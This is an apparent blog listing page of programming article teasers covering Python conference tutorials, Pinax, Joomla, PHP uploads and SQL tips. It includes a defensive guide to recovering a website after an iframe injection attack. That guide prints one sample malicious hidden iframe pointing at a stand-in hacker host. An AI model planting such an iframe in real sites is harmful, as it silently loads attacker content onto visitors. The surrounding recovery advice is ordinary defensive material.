Saturday Apr 19, 2014
Distributed and Cloud computing with Python
March 9th 9 a.m. – 12:20 p.m.
This tutorial will teach various ways to distribute python-based computation across a cloud or cluster. Tools covered include Pyro, Sun GridEngine. Google AppEngine, PiCloud, and Hadoop.
Read more... [Distributed and Cloud computing with Python]
 
Scientific Python Tools not only for Scientists and Engineers
March 9th 9 a.m. – 12:20 p.m.
Python provides numerous tools for scientific and engineering applications. This is an overview of the most widely used libraries including NumPy, matplotlib and tools for interfacing with C/FORTRAN. They are not only useful for scientists and engineers but also for programmers who need to do number crunching, simple yet powerful plotting of diagrams or interfacing with compiled languages.
Read more... [Scientific Python Tools not only for Scientists and Engineers]
 
Pinax Solutions
March 9th 9 a.m. – 12:20 p.m.
Pinax (http://pinaxproject.com) is a platform built on top of Django for rapidly developing websites. This solutions based tutorial will instruct on installation, projects, applications, templates, settings, deployment, contributing back, and much more. The presenters are Pinax core developers and will run through practical hands-on examples. Questions will be taken throughout the tutorial.

Abstract

Pinax (http://pinaxproject.com) is a platform built on top of Django (http://djangoproject.com) for rapidly developing websites. This tutorial will instruct on Pinax installation, creating projects, leveraging applications, modification of templates, Pinax-specific settings, media handling, deployment, how to contribute back to Pinax, and much more. The goal of the tutorial is to provide the attendees with the solutions to real world obstacles. The presenters are Pinax core developers and will run through lots of small, practical hands-on examples. We will take questions throughout the tutorial.

Intended Audience

Intermediate level Python programmers. Familiarity with Django and CPython 2.6+ assumed.

Class outline:

    * Introduction
    * Pinax Installation
    * Projects
    * Pinax specific settings
    * Authentication
          o Open ID
          o Facebook
    * Extending profiles via Idios
    * Changing avatar defaults
    * Modification of existing Pinax applications
    * Adding your own Django applications
    * Usage of group aware applications
    * Modification of templates
    * Django-Uni-Form
    * Media handling
    * jQuery and Pinax
    * Deploying Pinax
    * Finding help
    * Contributing back to Pinax
    * Q&A and time overrun buffer

Requirements

Attendees are required to bring a laptop with Python 2.6+ installed.
 
Python 101
March 9th 9 a.m. – 12:20 p.m.
This teaches the basics of Python for beginning and intermediate software developers. Most of the material is presented with the interactive interpreter shell instead of starting with a "Hello, world!" program. Each 10-15 minute section is a demonstration followed by hands-on exercises, some of which are meaty enough to keep advanced participants interested.
Read more... [Python 101]
 
Building your own tile server using OpenStreetMap
March 9th 9 a.m. – 12:20 p.m.
This tutorial covers subjects of how the vector data becomes a set of raster tiles you actually see when using web map providers (such as Google Maps, Bing Maps, Mapquest and others), what is map projection and how it changes the look of the map, why WMS is hard and why one should probably not try to implement it. In general, this tutorial will try to explain how the map is created.
Read more... [Building your own tile server using OpenStreetMap]
 
The ‘8 Commandments’ for Choosing a Unit Testing Solution
Teams who perform unit testing on a regular basis are perceived to be more reliable, professional and advanced. But what do you need to consider before choosing a unit testing solution? Typemock, the pioneers of easy unit testing solutions, have developed the ‘8 commandments’ below as a guide for ensuring you select a unit testing solution that is right for your development.
Read more... [The ‘8 Commandments’ for Choosing a Unit Testing Solution]
 
IFrame Injection Attack is most common and most basic cross site scripting (XSS) attacks
IFrame Injection Attack is considered one of the most common and most basic cross site scripting (XSS) attacks. If you have recently got an iframe attack to your website, do not panic. Here are a few things that you can do immediately after you discovered that your website has been a victim of an iframe injection attack.
{xtypo_code}
<iframe src="http://www.example-hacker-site.com/inject/?s=some-parameters" width="1" height="1" style="visibility: hidden"></iframe>
An example of a malicious IFRAME injection code
{/xtypo_code}

1. Take your website down for a certain period

It is recommended to take the website down as you do not want to be distributing malware or virus from your website to your visitors. The website should be offline while you are recovering the site.

2. Change all the passwords

Although this may seem like a simple step, many people, including myself, often fail to change all the passwords immediately after an attack has been discovered. You need to change all the passwords associated with the website; which include ftp passwords, ssh passwords, account passwords, database passwords, admin passwords and so on.

3. Take a copy of the affected website for further analysis

You may want to do a further analysis on the attack and might need to refer to the exact injection source code in the future. Take a copy of the affected website in a compressed format, eg: zip or gzip and store it in an quarantine area for later reference. Note that it is not advisable to keep the affected files on the server.

4. Replace the entire site with a clean backup copy

Do not rely on your hosting provider for a backup copy of your site. Many hosting providers say they do an automatic backup every night, however, it is more reliable if you have other backup solutions for your website.

5. Test the website and reopen

This is to make sure that the website is reverted to its clean, original version. Once you are happy with the result, you can reopen the website to the public.

6. Analyse how the attack was originated

In order to ensure that the same attack does not happen again, you will need to do a full analysis of the attack and how it was originated. Was it because of a security hole in your application? Was it caused by a weak file permission? Or is your server affected with some virus that injects these code into your website at regular interval? You will need to understand how it happens in order to prevent it in the future. And when necessary, obtain an expert advice.

7. Perform appropriate security measures based on the analysis

Although you may have recovered your website, it does not mean your website will not be attacked again. If the same security hole still exists, it is probably very likely that the website will be attacked again in the near future. Therefore, it is recommended that you perform necessary security measures, be it hardening your web server, upgrading an application, or introducing new security restrictions.

Some advice

I have encountered and recovered quite a few websites that had been attacked by malicious iframe exploit in the recent years. And the common causes seem to be as follows:

  • The website is hosted on a cheap web hosting service
  • The website is using an old version of an open source application (eg: WordPress 1.0) which has known security issues
  • File permissions on the server are not set accordingly (eg: every file and folder on the server is set to 777 - read-write-execute)
  • Weakness in an application code. For example, there is not sufficient input validation.
  • FTP rather than SFTP is used
  • There is no IP restriction for SSH and FTP accounts

There are a few simple things that can be done to reduce the risk of your website being attacked.

  • Change your passwords periodically (say, at least once a month)
  • Keep your applications up-to-date. Always upgrade immediately when a new version is available.
  • Clean up files and directories on the web server. Make sure there is no old file with .bak or .txt extensions lying around
  • Ensure that appropriate file permissions are used for every file and directory on the web server
  • Consult with a security expert to obtain the best advice
 
How to develop simple component for Joomla! CMS 1.0
Written by Vijay Patil   
JOOMLA! 1.0 COMPONENT TUTORIAL - PART 1: FRONT-END
A tutorial explaining how simple component for Joomla! CMS 1.0 works, and how to create a component. One may wonder why to write about version 1.0 of Joomla!, when version 1.5 is almost ready (as of  January 2007). I think version 1.0 is still a very good framework: one can get to know how Joomla! works, extend the PHP knowledge, and prepare for Joomla! 1.5, which is a lot different and more advanced. And since there rather will not be upgrade possible from 1.0 to 1.5, just migration (hopefully a fast and easy one, thanks to great developers), there may be still a lot of existing web sites working on Joomla! 1.0  for quite some time.
Read more... [How to develop simple component for Joomla! CMS 1.0]
 
Using PHP to upload files into MySQL database
Using PHP to upload files into MySQL database sometimes needed by some web application. For instance for storing pdf documents or images to make som kind of online briefcase (like Yahoo briefcase).
Read more... [Using PHP to upload files into MySQL database]
 
SQL Optimization Tips and Index Optimization tips

 

All the tips provided on this website about indexing and SQL Optimization are general guidelines. As with any general guideline, there are exceptions. Because of this, it is a good idea to test out various indexing strategies for the most common queries run against your database
Read more... [SQL Optimization Tips and Index Optimization tips]
 
<< Start < Prev 1 2 Next > End >>

Page 1 of 2